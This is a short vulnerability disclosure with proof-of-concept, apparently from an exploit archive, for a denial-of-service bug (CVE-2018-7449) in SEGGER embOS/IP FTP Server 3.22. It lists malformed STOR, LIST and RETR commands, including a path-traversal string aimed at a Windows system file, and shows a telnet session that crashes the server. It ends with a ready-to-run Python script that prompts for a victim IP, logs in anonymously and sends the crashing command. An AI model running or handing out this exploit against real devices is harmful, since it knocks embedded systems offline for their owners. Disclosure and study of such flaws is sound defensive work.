SEGGER embOS/IP FTP Server 3.22 - Denial of Service Vulnerability

[+] Credits: John Page (aka hyp3rlinx)      
 
 
Vendor:
=============
www.segger.com
 
 
Product:
===========
embOS/IP FTP Server v3.22
 
 
Vulnerability Type:
===================
FTP Commands Denial Of Service
 
 
 
CVE Reference:
==============
CVE-2018-7449
 
 
Security Issue:
================
SEGGER embOS/IP FTP Server 3.22 allows remote attackers to cause a denial of service (daemon crash)
via an invalid LIST, STOR, or RETR command.
 
STOR 666\r\n
LIST\r\n
RETR '+'..\\'*8+'Windows\system.ini\r\n
 
 
TELNET x.x.x.x 21
 
220 Welcome to embOS/IP FTP server
USER anonymous
331 Password required.
PASS anonymous
230 User logged in, proceed.
STOR Bye!
 
CRASH!!!
 
 
 
Exploit/POC:
=============
import socket,time
 
VICTIM=raw_input('[+]Segger v3.22 FTP Server IP > ')
USR='anonymous'
PWD='anonymous'
CMD="STOR Bye!\r\n"
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((VICTIM, 21)) 
print s.recv(1024) # Recieve FTP Banner
time.sleep(1)
s.send("USER " + USR+ "\r\n") 
print s.recv(1024) 
time.sleep(1)
s.send("PASS "+ PWD+"\r\n") #
print s.recv(1024) 
time.sleep(1)
s.send(CMD)
print 'Sent %s' % CMD
s.close()

#  0day.today [2018-03-10]  #